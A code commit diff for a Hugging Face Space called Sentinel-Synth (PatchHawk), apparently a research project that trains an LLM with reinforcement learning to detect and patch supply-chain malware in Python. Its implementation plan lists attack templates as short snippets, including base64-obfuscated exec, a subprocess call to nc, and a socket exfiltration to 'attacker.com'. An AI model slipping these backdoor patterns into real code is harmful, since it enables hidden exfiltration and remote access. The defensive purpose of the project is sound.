Spaces:

Ramkan7
/

Patch_Hawk

Running

App Files Files Community

RAMCr7 commited on Apr 4

Commit

91f7972

1 Parent(s): 9a00117

added inital

Browse files

Files changed (48) hide show

README.md +118 -1
config.yaml +28 -0
docker/Dockerfile.sandbox +5 -0
docs/implementation +277 -0
requirements.txt +15 -0
sentinel_synth/__init__.py +0 -0
sentinel_synth/config.py +80 -0
sentinel_synth/dashboard/__init__.py +0 -0
sentinel_synth/dashboard/app.py +169 -0
sentinel_synth/data/__init__.py +0 -0
sentinel_synth/data/benign/ds_binarysearch.py +13 -0
sentinel_synth/data/benign/ds_linkedlist.py +19 -0
sentinel_synth/data/benign/ds_queue.py +15 -0
sentinel_synth/data/benign/ds_sorting.py +8 -0
sentinel_synth/data/benign/ds_stack.py +15 -0
sentinel_synth/data/benign/io_config.py +15 -0
sentinel_synth/data/benign/io_csv.py +11 -0
sentinel_synth/data/benign/io_json.py +5 -0
sentinel_synth/data/benign/io_log.py +8 -0
sentinel_synth/data/benign/io_template.py +6 -0
sentinel_synth/data/benign/math_factorial.py +5 -0
sentinel_synth/data/benign/math_fibonacci.py +7 -0
sentinel_synth/data/benign/math_gcd.py +5 -0
sentinel_synth/data/benign/math_matrix.py +3 -0
sentinel_synth/data/benign/math_prime.py +8 -0
sentinel_synth/data/benign/misc_calc.py +13 -0
sentinel_synth/data/benign/misc_date.py +3 -0
sentinel_synth/data/benign/misc_password.py +8 -0
sentinel_synth/data/benign/misc_temp.py +7 -0
sentinel_synth/data/benign/misc_url.py +11 -0
sentinel_synth/data/benign/str_anagram.py +3 -0
sentinel_synth/data/benign/str_caesar.py +10 -0
sentinel_synth/data/benign/str_palindrome.py +4 -0
sentinel_synth/data/benign/str_slug.py +6 -0
sentinel_synth/data/benign/str_wordcount.py +7 -0
sentinel_synth/data/generate_scenarios.py +253 -0
sentinel_synth/data/scenarios.json +402 -0
sentinel_synth/data/sdk_config.yaml +33 -0
sentinel_synth/envs/__init__.py +0 -0
sentinel_synth/envs/sentinel_env.py +175 -0
sentinel_synth/tests/__init__.py +0 -0
sentinel_synth/tests/test_validator.py +57 -0
sentinel_synth/training/__init__.py +0 -0
sentinel_synth/training/train_grpo.py +187 -0
sentinel_synth/validation/__init__.py +0 -0
sentinel_synth/validation/docker_runner.py +107 -0
sentinel_synth/validation/patch_validator.py +87 -0
setup.py +15 -0

README.md CHANGED Viewed

	@@ -1 +1,118 @@
1	- # ~~PatchHawk~~

+# 🦅 Sentinel-Synth: Autonomous Supply-Chain Guard
+**Sentinel-Synth** is an advanced Reinforcement Learning (RL) platform designed for the detection, analysis, and automated patching of software supply-chain vulnerabilities. It leverages **Group Relative Policy Optimization (GRPO)** and **Meta's Synthetic Data Kit** to train fine-tuned LLM agents that can secure CI/CD pipelines autonomously.
+---
+## 🏗 System Architecture
+The Sentinel-Synth ecosystem is built on four functional pillars:
+```mermaid
+graph TD
+    A[Meta SDK / Mutation Engine] -->|Synthetic Scenarios| B[Scenarios JSON]
+    B --> C[Gymnasium RL Environment]
+    C -->|Observations| D[GRPO Policy Agent (Qwen2.5-Coder)]
+    D -->|Actions| C
+    C -->|Validation| E[Docker Sandbox & Patch Validator]
+    E -->|Reward Signal| D
+    D -->|Metrics| F[W&B / Dashboard]
+```
+### Core Components
+- **`sentinel_synth.data`**: Orchestrates scenario synthesis using Meta's `synthetic-data-kit` (Track A) and a custom mutation engine (Track B).
+- **`sentinel_synth.envs`**: A `gymnasium` environment that formalizes DevSecOps tasks into an RL problem.
+- **`sentinel_synth.validation`**: A two-tiered execution engine that uses isolated Docker containers for syntax checking and re-attack verification.
+- **`sentinel_synth.training`**: The training loop using `trl` and `unsloth` for efficient GRPO fine-tuning.
+---
+## 🚀 Getting Started
+### 1. Prerequisites
+- **Python 3.10+** (3.11 recommended)
+- **Docker** (Ensure your user has permission to manage containers)
+- **vLLM Server** (Optional, for Track A synthetic data generation)
+- **GPU** (NVIDIA/AMD) for standard training; CPU supported for dry-runs.
+### 2. Installation
+```bash
+# Set up a virtual environment (recommended)
+python3 -m venv venv
+source venv/bin/activate
+# Install the base system
+pip install -r requirements.txt
+pip install -e .
+# Build the sandbox Docker image
+docker build -t sentinel-sandbox:latest -f docker/Dockerfile.sandbox .
+```
+### 3. Configuration
+Copy the sample environment file and adjust your settings:
+```bash
+cp .env.example .env  # Define model paths, W&B keys, etc.
+```
+Edit `config.yaml` to tune training hyperparameters and environment thresholds.
+---
+## 🧪 Detailed Workflow
+### 📤 Phase 1: Data Generation & Analysis
+Sentinel-Synth generates diverse training scenarios including Typosquatting, Obfuscated Exec, and Subprocess Backdoors.
+**Using Meta's Synthetic Data Kit (Track A):**
+1. Ensure a vLLM server is running.
+2. Configure `sentinel_synth/data/sdk_config.yaml`.
+3. Run the generator:
+```bash
+python3 -m sentinel_synth.data.generate_scenarios --use-sdk --output data/scenarios.json
+```
+**Using the Mutation Engine (Track B):**
+This mode takes benign code and injects malicious patterns deterministically.
+```bash
+python3 -m sentinel_synth.data.generate_scenarios --output data/scenarios.json
+```
+---
+### 🧠 Phase 2: Agent Training (GRPO)
+Train the `Qwen2.5-Coder-7B` model using the novel Group Relative Policy Optimization algorithm. GRPO allows the agent to learn complex decision-making without a value model.
+**Dry-Run (Pipeline Validation):**
+Test the logic on CPU without a GPU:
+```bash
+python3 -m sentinel_synth.training.train_grpo --dry-run
+```
+**Full Training:**
+```bash
+# Ensure WANDB is logged in or API key is in .env
+python3 -m sentinel_synth.training.train_grpo --use-docker
+```
+*The agent receives rewards based on: valid detection (+1.5), successful patching (+4.0), and avoiding false positives (-2.0).*
+---
+### 🛡 Phase 3: Validation & Sandbox Execution
+Every patch proposed by the agent is autonomously validated in a secure Docker sandbox:
+1. **Syntax Check**: Ensuring the code is parseable.
+2. **Functional Test**: Running units tests from `scenarios.json`.
+3. **Re-Attack Verification**: The system re-executes the vulnerability payload to verify the patch actually neutralized the threat (e.g., checking if suspicious file writes or network calls stopped).
+---
+## 📊 Monitoring & UI
+- **Weights & Biases**: Real-time tracking of mean rewards, action distributions, and loss curves.
+- **Streamlit Dashboard**: A professional interface for interactive analysis:
+```bash
+streamlit run sentinel_synth/dashboard/app.py
+```
+---
+## 📄 License
+Sentinel-Synth is licensed under the Apache 2.0 License. See the LICENSE file for details.

config.yaml ADDED Viewed

	@@ -0,0 +1,28 @@

+# ============================================================
+# Sentinel-Synth Training & Pipeline Configuration
+# All tunable hyperparameters live here
+# ============================================================
+data_generation:
+  num_samples: 10
+  output_format: "json"
+  benign_dir: "sentinel_synth/data/benign/"
+  scenarios_output: "sentinel_synth/data/scenarios.json"
+  sdk_config: "sentinel_synth/data/sdk_config.yaml"
+training:
+  learning_rate: 0.000001
+  group_size: 4
+  max_seq_len: 1024
+  max_steps: 100
+  gradient_accumulation_steps: 4
+  ppo_clip_eps: 0.2
+  lora_r: 16
+  lora_alpha: 16
+  lora_dropout: 0
+  output_dir: "grpo_lora"
+environment:
+  max_steps: 5
+  use_docker: false
+  sandbox_timeout_sec: 5

docker/Dockerfile.sandbox ADDED Viewed

	@@ -0,0 +1,5 @@

+FROM python:3.11-slim
+RUN useradd -m sandbox
+USER sandbox
+WORKDIR /app
+CMD ["python", "script.py"]

docs/implementation ADDED Viewed

	@@ -0,0 +1,277 @@

+# Sentinel-Synth Phase 1 — Implementation Plan
+## Goal
+Build the complete Sentinel-Synth system: an RL-based supply-chain attack detection platform with synthetic data generation, a Gymnasium environment, Docker-sandboxed validation, GRPO training (Unsloth + W&B), and a Streamlit dashboard.
+## Project Structure
+```
+PatchHawk/
+├── sentinel_synth/
+│   ├── __init__.py
+│   ├── envs/
+│   │   ├── __init__.py
+│   │   └── sentinel_env.py          # Gymnasium RL environment
+│   ├── data/
+│   │   ├── __init__.py
+│   │   ├── generate_scenarios.py    # Synthetic data pipeline
+│   │   ├── benign/                  # 20-30 benign Python files
+│   │   └── scenarios.json           # Generated dataset (output)
+│   ├── validation/
+│   │   ├── __init__.py
+│   │   ├── docker_runner.py         # Docker sandbox execution
+│   │   └── patch_validator.py       # 3-step patch validation
+│   ├── training/
+│   │   ├── __init__.py
+│   │   └── train_grpo.py            # GRPO + Unsloth + W&B training
+│   ├── dashboard/
+│   │   └── app.py                   # Streamlit demo UI
+│   └── tests/
+│       ├── __init__.py
+│       └── test_validator.py        # Unit tests for validator
+├── docker/
+│   └── Dockerfile.sandbox           # Lightweight Python sandbox
+├── requirements.txt
+├── setup.py
+└── README.md
+```
+---
+## Proposed Changes
+### Component 1: Benign Code Corpus (`sentinel_synth/data/benign/`)
+#### [NEW] 25 benign Python files
+Create 25 small, self-contained Python files that serve as the benign corpus for mutation. Categories:
+- **Math utilities** (5): fibonacci, factorial, prime check, gcd, matrix ops
+- **String utilities** (5): palindrome, anagram, caesar cipher, word count, slug generator
+- **Data structures** (5): stack, queue, linked list, binary search, sorting
+- **File/IO utilities** (5): CSV parser, JSON formatter, config reader, log parser, template engine
+- **Misc** (5): temperature converter, password validator, date formatter, calculator, URL parser
+Each file exports a main function with docstring and is testable with simple assertions.
+---
+### Component 2: Synthetic Data Generator (`sentinel_synth/data/generate_scenarios.py`)
+#### [NEW] [generate_scenarios.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/data/generate_scenarios.py)
+**Key design decisions:**
+- **Track A (Meta synthetic-data-kit)**: Will be implemented as a pluggable module. Since it requires a running vLLM server with Llama 3 8B, the generator will have a `--use-sdk` flag. When disabled, it generates SDK-style examples from hardcoded templates (for offline/demo use).
+- **Track B (Mutation engine)**: Deterministic mutation of benign files using 8 attack templates.
+- Output: `scenarios.json` with 50+ entries.
+**Attack templates (8):**
+1. Typosquatting import (`import pythonn`)
+2. Obfuscated exec (`exec(base64.b64decode(...))`)
+3. Environment variable hijack (`os.environ['PATH'] = '/tmp'`)
+4. Subprocess backdoor (`subprocess.call(['nc', ...])`)
+5. Pickle deserialization (`pickle.loads(untrusted)`)
+6. Hidden eval in decorator (`eval(user_input)`)
+7. Socket exfiltration (`socket.connect(('attacker.com', 80))`)
+8. Malicious `__import__` (`__import__('os').system('...')`)
+**Scenario JSON schema:**
+```json
+{
+  "id": "tp_001",
+  "type": "true_positive|false_positive|functional",
+  "code_snippet": "...",
+  "patch": "...|null",
+  "unit_test_code": "...|null",
+  "label": "malicious|benign",
+  "source": "mutation_engine|synthetic_data_kit|manual",
+  "attack_type": "typosquatting|obfuscated_exec|...|null"
+}
+```
+---
+### Component 3: Docker Sandbox (`docker/Dockerfile.sandbox` + `sentinel_synth/validation/docker_runner.py`)
+#### [NEW] [Dockerfile.sandbox](file:///home/ram/Ram/repos/PatchHawk/docker/Dockerfile.sandbox)
+Minimal Python 3.11-slim image with non-root user, no network, memory/CPU limits.
+#### [NEW] [docker_runner.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/validation/docker_runner.py)
+- `run_in_docker(code, timeout_sec=5)` → `{"stdout", "stderr", "exit_code", "network_blocked", "file_writes"}`
+- Uses `docker` Python SDK for container management
+- Automatic temp directory cleanup
+- Graceful container kill on timeout
+---
+### Component 4: Patch Validator (`sentinel_synth/validation/patch_validator.py`)
+#### [NEW] [patch_validator.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/validation/patch_validator.py)
+Three-step validation pipeline:
+1. **Syntax check**: `py_compile` in Docker
+2. **Unit test execution**: Run scenario's `unit_test_code` against patched code in Docker
+3. **Re-attack verification**: Confirm vulnerability is neutralized by comparing original vs. patched execution telemetry
+Returns `(bool, str, dict)` — (passed, message, details).
+---
+### Component 5: Gymnasium Environment (`sentinel_synth/envs/sentinel_env.py`)
+#### [NEW] [sentinel_env.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/envs/sentinel_env.py)
+- Inherits `gymnasium.Env`
+- **Observation space**: `Dict` with `code_snippet` (Text), `static_flags` (Box[5]), `risk_score` (Box[1])
+- **Action space**: `Discrete(5)` — ANALYZE, EXECUTE_SANDBOX, BLOCK_PR, SUBMIT_PATCH, REQUEST_REVIEW
+- `max_steps = 5`
+- `reset()`: Random scenario selection, compute static flags + risk score
+- `step(action)`: Full reward logic per spec (BLOCK=+2/-1, PATCH=+3/-1.5/-1, etc.)
+- Integrates `docker_runner` and `patch_validator`
+---
+### Component 6: GRPO Training (`sentinel_synth/training/train_grpo.py`)
+#### [NEW] [train_grpo.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/training/train_grpo.py)
+- Load `Qwen2.5-Coder-7B` via Unsloth in 4-bit with LoRA
+- Custom reward function that runs full environment trajectory
+- `GRPOTrainer` from `trl` with group_size=4
+- **W&B integration**: Log per-epoch metrics (mean reward, action distribution, patch success rate, loss)
+- Hyperparameters: `lr=1e-6`, `group_size=4`, `ppo_clip_eps=0.2`, `max_seq_length=1024`
+- Output: LoRA adapter to `./grpo_lora/`
+> [!IMPORTANT]
+> The training script requires GPU access (MI300X target) and a significant amount of VRAM for even the 4-bit model. During development, we'll include a `--dry-run` mode that validates the pipeline without actually training.
+---
+### Component 7: Streamlit Dashboard (`sentinel_synth/dashboard/app.py`)
+#### [NEW] [app.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/dashboard/app.py)
+- Code input text area
+- "Analyze" button triggers environment run
+- Display panels: Agent decision, Patch code, Validation result, Docker telemetry
+- Demo mode with pre-loaded examples (1 malicious, 1 benign)
+- Dark-themed UI with Cobalt Blue accent colors
+- W&B run link display
+---
+### Component 8: Tests (`sentinel_synth/tests/test_validator.py`)
+#### [NEW] [test_validator.py](file:///home/ram/Ram/repos/PatchHawk/sentinel_synth/tests/test_validator.py)
+4 test cases using pytest:
+1. `test_syntax_error_detected` — patch with syntax error → `(False, "Syntax error", ...)`
+2. `test_unit_test_pass` — correct patch → `(True, "Patch is valid", ...)`
+3. `test_unit_test_fail` — broken patch → `(False, "Unit test failed", ...)`
+4. `test_vulnerability_remains` — incomplete patch → `(False, "Vulnerability remains", ...)`
+---
+### Component 9: Project Configuration
+#### [NEW] [requirements.txt](file:///home/ram/Ram/repos/PatchHawk/requirements.txt)
+```
+gymnasium>=0.29.0
+docker>=7.0.0
+streamlit>=1.30.0
+unsloth>=2024.0
+trl>=0.7.0
+transformers>=4.38.0
+torch>=2.1.0
+wandb>=0.16.0
+pytest>=8.0.0
+peft>=0.8.0
+datasets>=2.16.0
+```
+#### [NEW] [setup.py](file:///home/ram/Ram/repos/PatchHawk/setup.py)
+Standard setuptools configuration registering `sentinel_synth` as a package.
+#### [MODIFY] [README.md](file:///home/ram/Ram/repos/PatchHawk/README.md)
+Full project documentation with architecture diagram, setup instructions, usage guide, and data flow.
+---
+## User Review Required
+> [!IMPORTANT]
+> **vLLM / Llama 3 dependency**: Track A of the data generator requires a running vLLM server with Llama 3 8B. Should I:
+> - (A) Implement it with a fallback to template-based generation when the server is unavailable?
+> - (B) Skip Track A entirely for Phase 1 and use only the mutation engine (Track B) + manual templates?
+> [!IMPORTANT]
+> **Docker requirement**: The sandbox and validator require Docker to be installed and the current user to have Docker permissions. Should I add a `--no-docker` mode that simulates sandbox execution for development/testing without Docker?
+> [!WARNING]
+> **W&B API key**: The training script needs a W&B API key. I'll use `wandb.login()` which reads from `WANDB_API_KEY` env var or prompts interactively. Is this acceptable?
+---
+## Open Questions
+1. **GPU availability**: Is the MI300X available now for testing the training script, or should I focus on making the pipeline work with `--dry-run` first?
+2. **Benign corpus**: Should I create the 25 benign Python files from scratch (my plan), or do you have an existing corpus to use?
+3. **synthetic-data-kit version**: Which version of Meta's synthetic-data-kit should I target? The API may have changed.
+---
+## Verification Plan
+### Automated Tests
+```bash
+# 1. Generate scenarios
+python -m sentinel_synth.data.generate_scenarios --output sentinel_synth/data/scenarios.json
+# 2. Validate scenarios.json has 50+ entries
+python -c "import json; d=json.load(open('sentinel_synth/data/scenarios.json')); assert len(d)>=50"
+# 3. Build Docker sandbox image
+docker build -t sentinel-sandbox:latest -f docker/Dockerfile.sandbox .
+# 4. Run unit tests
+pytest sentinel_synth/tests/test_validator.py -v
+# 5. Test environment with gym checker
+python -c "import gymnasium; from sentinel_synth.envs.sentinel_env import SentinelEnv; env=SentinelEnv(); gymnasium.utils.env_checker.check_env(env)"
+# 6. Dry-run training
+python -m sentinel_synth.training.train_grpo --dry-run
+# 7. Launch dashboard
+streamlit run sentinel_synth/dashboard/app.py
+```
+### Manual Verification
+- Verify Docker containers are properly isolated (no network, memory limits)
+- Verify W&B dashboard shows training metrics
+- Verify Streamlit dashboard renders correctly with demo examples
+---
+## Execution Order
+```mermaid
+graph TD
+    A[1. Project scaffolding + requirements] --> B[2. Benign corpus - 25 files]
+    B --> C[3. Data generator + scenarios.json]
+    A --> D[4. Dockerfile.sandbox]
+    D --> E[5. docker_runner.py]
+    E --> F[6. patch_validator.py]
+    C --> G[7. sentinel_env.py]
+    F --> G
+    G --> H[8. train_grpo.py + W&B]
+    F --> I[9. test_validator.py]
+    H --> J[10. Streamlit dashboard]
+    G --> J
+    J --> K[11. README.md]
+```

requirements.txt ADDED Viewed

	@@ -0,0 +1,15 @@

+gymnasium>=0.29.0
+docker>=7.0.0
+streamlit>=1.30.0
+unsloth>=2024.0
+trl>=0.7.0
+transformers>=4.38.0
+torch>=2.1.0
+wandb>=0.16.0
+pytest>=8.0.0
+peft>=0.8.0
+datasets>=2.16.0
+python-dotenv>=1.0.0
+PyYAML>=6.0
+synthetic-data-kit>=0.1.0
+vllm-python-client>=0.1.0

sentinel_synth/__init__.py ADDED Viewed

File without changes

sentinel_synth/config.py ADDED Viewed

	@@ -0,0 +1,80 @@

+"""
+Centralized configuration loader for Sentinel-Synth.
+Loads:
+  - .env  → ENV dict (model names, API keys, secrets)
+  - config.yaml → CFG dict (training hyperparameters, paths)
+Usage:
+    from sentinel_synth.config import ENV, CFG
+"""
+import os
+import yaml
+from pathlib import Path
+# ---------- .env loading (no external dependency) ----------
+def _load_dotenv(path: str):
+    """Minimal .env parser — avoids requiring python-dotenv at import time."""
+    env = {}
+    if not os.path.exists(path):
+        return env
+    with open(path) as f:
+        for line in f:
+            line = line.strip()
+            if not line or line.startswith("#"):
+                continue
+            if "=" in line:
+                key, _, value = line.partition("=")
+                key = key.strip()
+                value = value.strip()
+                env[key] = value
+                # Also set in os.environ so downstream libs (wandb) pick it up
+                if value:
+                    os.environ.setdefault(key, value)
+    return env
+# Resolve project root (two levels up from this file)
+_PROJECT_ROOT = Path(__file__).resolve().parent.parent
+_dotenv_raw = _load_dotenv(str(_PROJECT_ROOT / ".env"))
+ENV = {
+    "SYNTH_GENERATOR_MODEL": os.getenv("SYNTH_GENERATOR_MODEL", _dotenv_raw.get("SYNTH_GENERATOR_MODEL", "meta-llama/Llama-3.2-3B-Instruct")),
+    "GRPO_POLICY_MODEL":     os.getenv("GRPO_POLICY_MODEL",     _dotenv_raw.get("GRPO_POLICY_MODEL", "unsloth/Qwen2.5-Coder-7B-Instruct")),
+    "WANDB_API_KEY":         os.getenv("WANDB_API_KEY",         _dotenv_raw.get("WANDB_API_KEY", "")),
+    "WANDB_PROJECT":         os.getenv("WANDB_PROJECT",         _dotenv_raw.get("WANDB_PROJECT", "sentinel-synth")),
+    "WANDB_RUN_NAME":        os.getenv("WANDB_RUN_NAME",        _dotenv_raw.get("WANDB_RUN_NAME", "grpo-qwen-coder-7b")),
+}
+# ---------- config.yaml loading ----------
+_config_path = _PROJECT_ROOT / "config.yaml"
+if _config_path.exists():
+    with open(_config_path) as f:
+        CFG = yaml.safe_load(f)
+else:
+    CFG = {
+        "data_generation": {
+            "num_samples": 10,
+            "output_format": "json",
+            "benign_dir": "sentinel_synth/data/benign/",
+            "scenarios_output": "sentinel_synth/data/scenarios.json",
+            "sdk_config": "sentinel_synth/data/sdk_config.yaml",
+        },
+        "training": {
+            "learning_rate": 1e-6,
+            "group_size": 4,
+            "max_seq_len": 1024,
+            "max_steps": 100,
+            "gradient_accumulation_steps": 4,
+            "ppo_clip_eps": 0.2,
+            "lora_r": 16,
+            "lora_alpha": 16,
+            "lora_dropout": 0,
+            "output_dir": "grpo_lora",
+        },
+        "environment": {
+            "max_steps": 5,
+            "use_docker": False,
+            "sandbox_timeout_sec": 5,
+        },
+    }

sentinel_synth/dashboard/__init__.py ADDED Viewed

File without changes

sentinel_synth/dashboard/app.py ADDED Viewed

	@@ -0,0 +1,169 @@

+import streamlit as st
+import json
+import time
+from sentinel_synth.envs.sentinel_env import SentinelEnv
+st.set_page_config(
+    page_title="Sentinel-Synth Dashboard",
+    page_icon="🛡️",
+    layout="wide",
+    initial_sidebar_state="expanded",
+)
+# Custom CSS for Cobalt Blue theming and dark mode
+st.markdown("""
+<style>
+    :root {
+        --cobalt-blue: #0047AB;
+        --cobalt-light: #2A6DC9;
+        --cobalt-dark: #002255;
+    }
+    .stApp {
+        background-color: #0d1117;
+        color: #c9d1d9;
+    }
+    .css-1d391kg {
+        background-color: #161b22;
+    }
+    /* Headers */
+    h1, h2, h3 {
+        color: #58a6ff !important;
+    }
+    /* Sidebar */
+    .css-1lcbmhc {
+        background-color: #161b22;
+    }
+    /* Buttons */
+    .stButton>button {
+        background-color: var(--cobalt-blue);
+        color: white;
+        border: none;
+        border-radius: 4px;
+        transition: 0.3s;
+    }
+    .stButton>button:hover {
+        background-color: var(--cobalt-light);
+        border: none;
+        color: white;
+    }
+    /* Info box */
+    .info-box {
+        background-color: #1c2128;
+        border-left: 4px solid var(--cobalt-blue);
+        padding: 1rem;
+        border-radius: 0.25rem;
+        margin-bottom: 1rem;
+    }
+    .status-malicious { color: #ff7b72; font-weight: bold; }
+    .status-benign { color: #3fb950; font-weight: bold; }
+    .status-patched { color: #79c0ff; font-weight: bold; }
+</style>
+""", unsafe_allow_html=True)
+@st.cache_resource
+def get_env():
+    return SentinelEnv(use_docker=False)
+def main():
+    st.title("🛡️ Sentinel-Synth | GRPO DevSecOps Agent")
+    st.markdown("Supply-chain attack detection and auto-patching platform via Reinforcement Learning.")
+    env = get_env()
+    with st.sidebar:
+        st.header("Control Panel")
+        mode = st.radio("Mode", ["Demo Scenarios", "Custom Code"])
+        run_docker = st.checkbox("Use Docker Sandbox", value=False)
+        st.markdown("---")
+        st.markdown("**W&B Run:** [View Logs](https://wandb.ai)")
+        st.markdown("**LLM Adapter:** `grpo_lora_qwen`")
+    env.use_docker = run_docker
+    if mode == "Demo Scenarios":
+        col1, col2 = st.columns([1, 1])
+        with col1:
+            if st.button("Load Malicious Example"):
+                malicious = [s for s in env.scenarios if s["label"] == "malicious"]
+                if malicious:
+                    st.session_state["code"] = malicious[0]["code_snippet"]
+                    st.session_state["scenario"] = malicious[0]
+        with col2:
+            if st.button("Load Benign Example"):
+                benign = [s for s in env.scenarios if s["label"] == "benign"]
+                if benign:
+                    st.session_state["code"] = benign[0]["code_snippet"]
+                    st.session_state["scenario"] = benign[0]
+    code_input = st.text_area("Python Code Snippet", value=st.session_state.get("code", ""), height=300)
+    if st.button("Analyze & Diffuse"):
+        if not code_input:
+            st.warning("Please provide code to analyze.")
+            return
+        scenario = st.session_state.get("scenario")
+        if mode == "Custom Code" or not scenario or scenario["code_snippet"] != code_input:
+            scenario = {
+                "id": "custom",
+                "label": "unknown",
+                "type": "custom",
+                "code_snippet": code_input,
+                "patch": None
+            }
+        with st.spinner("Agent computing actions in OpenEnv..."):
+            obs, _ = env.reset(options={"scenario": scenario})
+            # Dummy policy for UI demonstration since we don't load the real adapter here yet
+            time.sleep(1)
+            risk = obs["risk_score"][0]
+            action = env.ACTION_SUBMIT_PATCH if risk > 0.4 and scenario.get("patch") else env.ACTION_ANALYZE
+            # If merely analyzed, let's step once more to see what we do
+            if action == env.ACTION_ANALYZE:
+                obs, reward, done, _, info = env.step(action)
+                action = env.ACTION_BLOCK_PR if risk > 0.6 else env.ACTION_REQUEST_REVIEW
+            obs, reward, done, _, info = env.step(action)
+        st.subheader("Agent Report")
+        c1, c2, c3 = st.columns(3)
+        c1.metric("Component Risk Score", f"{risk:.2f}", delta_color="inverse", delta=f"{risk-0.2:.2f}")
+        action_names = ["ANALYZE", "SANDBOX", "BLOCK", "PATCH", "REVIEW"]
+        c2.metric("Agent Action Taken", action_names[action])
+        c3.metric("Reward Received", f"{reward:+.2f}")
+        # Display tabs for detailed results
+        tab1, tab2, tab3 = st.tabs(["Action Details", "Sandbox Telemetry", "Patch Proposal"])
+        with tab1:
+            if action == env.ACTION_BLOCK_PR:
+                st.markdown("<div class='info-box status-malicious'>Action: BLOCKED. Vulnerability detected and no patch available.</div>", unsafe_allow_html=True)
+            elif action == env.ACTION_SUBMIT_PATCH:
+                st.markdown("<div class='info-box status-patched'>Action: PATCH SUBMITTED. Vulnerability neutralized.</div>", unsafe_allow_html=True)
+                st.json(info)
+            else:
+                st.markdown("<div class='info-box status-benign'>Action: REVIEW / ANALYZE. Code appears nominally safe or requires human review.</div>", unsafe_allow_html=True)
+        with tab2:
+            st.markdown("**(Telemetry simulates background execution for static code)**")
+            if "telemetry" in info:
+                st.json(info["telemetry"])
+            else:
+                st.info("No sandbox execution triggered for this path.")
+        with tab3:
+            if action == env.ACTION_SUBMIT_PATCH and scenario.get("patch"):
+                st.code(scenario["patch"], language='python')
+                if info.get("validation_success"):
+                    st.success("Patch passed 3-stage validation pipeline!")
+            else:
+                st.info("No patch generated.")
+if __name__ == "__main__":
+    main()

sentinel_synth/data/__init__.py ADDED Viewed

File without changes

sentinel_synth/data/benign/ds_binarysearch.py ADDED Viewed

	@@ -0,0 +1,13 @@

+def binary_search(arr, target):
+    """Perform binary search."""
+    low = 0
+    high = len(arr) - 1
+    while low <= high:
+        mid = (low + high) // 2
+        if arr[mid] == target:
+            return mid
+        elif arr[mid] < target:
+            low = mid + 1
+        else:
+            high = mid - 1
+    return -1

sentinel_synth/data/benign/ds_linkedlist.py ADDED Viewed

	@@ -0,0 +1,19 @@

+class Node:
+    def __init__(self, data):
+        self.data = data
+        self.next = None
+class LinkedList:
+    """A simple linked list."""
+    def __init__(self):
+        self.head = None
+    def append(self, data):
+        new_node = Node(data)
+        if not self.head:
+            self.head = new_node
+            return
+        last = self.head
+        while last.next:
+            last = last.next
+        last.next = new_node

sentinel_synth/data/benign/ds_queue.py ADDED Viewed

	@@ -0,0 +1,15 @@

+class Queue:
+    """A simple queue implementation."""
+    def __init__(self):
+        self.items = []
+    def enqueue(self, item):
+        self.items.insert(0, item)
+    def dequeue(self):
+        if not self.is_empty():
+            return self.items.pop()
+        return None
+    def is_empty(self):
+        return len(self.items) == 0

sentinel_synth/data/benign/ds_sorting.py ADDED Viewed

	@@ -0,0 +1,8 @@

+def bubble_sort(arr):
+    """Sort an array using bubble sort."""
+    n = len(arr)
+    for i in range(n):
+        for j in range(0, n-i-1):
+            if arr[j] > arr[j+1]:
+                arr[j], arr[j+1] = arr[j+1], arr[j]
+    return arr

sentinel_synth/data/benign/ds_stack.py ADDED Viewed

	@@ -0,0 +1,15 @@

+class Stack:
+    """A simple stack implementation."""
+    def __init__(self):
+        self.items = []
+    def push(self, item):
+        self.items.append(item)
+    def pop(self):
+        if not self.is_empty():
+            return self.items.pop()
+        return None
+    def is_empty(self):
+        return len(self.items) == 0

sentinel_synth/data/benign/io_config.py ADDED Viewed

	@@ -0,0 +1,15 @@

+def read_ini_config(content):
+    """Read a simple INI configuration."""
+    config = {}
+    current_section = None
+    for line in content.split('\n'):
+        line = line.strip()
+        if not line or line.startswith('#'):
+            continue
+        if line.startswith('[') and line.endswith(']'):
+            current_section = line[1:-1]
+            config[current_section] = {}
+        elif '=' in line and current_section:
+            key, val = line.split('=', 1)
+            config[current_section][key.strip()] = val.strip()
+    return config

sentinel_synth/data/benign/io_csv.py ADDED Viewed

	@@ -0,0 +1,11 @@

+def parse_csv(csv_content):
+    """Parse simple CSV content."""
+    lines = csv_content.strip().split('\n')
+    if not lines:
+        return []
+    headers = lines[0].split(',')
+    result = []
+    for line in lines[1:]:
+        values = line.split(',')
+        result.append(dict(zip(headers, values)))
+    return result

sentinel_synth/data/benign/io_json.py ADDED Viewed

	@@ -0,0 +1,5 @@

+import json
+def format_json(obj):
+    """Format dictionary as readable JSON string."""
+    return json.dumps(obj, indent=4, sort_keys=True)

sentinel_synth/data/benign/io_log.py ADDED Viewed

	@@ -0,0 +1,8 @@

+def parse_logs(log_lines):
+    """Parse simple log lines into level and message."""
+    parsed = []
+    for line in log_lines:
+        parts = line.split(' - ', 1)
+        if len(parts) == 2:
+            parsed.append({"level": parts[0].strip('[]'), "message": parts[1]})
+    return parsed

sentinel_synth/data/benign/io_template.py ADDED Viewed

	@@ -0,0 +1,6 @@

+def render_template(template, context):
+    """Simple template rendering replacing {{key}}."""
+    result = template
+    for key, value in context.items():
+        result = result.replace(f"{{{{{key}}}}}", str(value))
+    return result

sentinel_synth/data/benign/math_factorial.py ADDED Viewed

	@@ -0,0 +1,5 @@

+def factorial(n):
+    """Calculate the factorial of a number."""
+    if n == 0:
+        return 1
+    return n * factorial(n - 1)

sentinel_synth/data/benign/math_fibonacci.py ADDED Viewed

	@@ -0,0 +1,7 @@

+def fibonacci(n):
+    """Return the nth Fibonacci number."""
+    if n <= 0:
+        return 0
+    elif n == 1:
+        return 1
+    return fibonacci(n - 1) + fibonacci(n - 2)

sentinel_synth/data/benign/math_gcd.py ADDED Viewed

	@@ -0,0 +1,5 @@

+def gcd(a, b):
+    """Calculate the Greatest Common Divisor."""
+    while b:
+        a, b = b, a % b
+    return a

sentinel_synth/data/benign/math_matrix.py ADDED Viewed

	@@ -0,0 +1,3 @@

+def matrix_addition(mat1, mat2):
+    """Add two matrices."""
+    return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]

sentinel_synth/data/benign/math_prime.py ADDED Viewed

	@@ -0,0 +1,8 @@

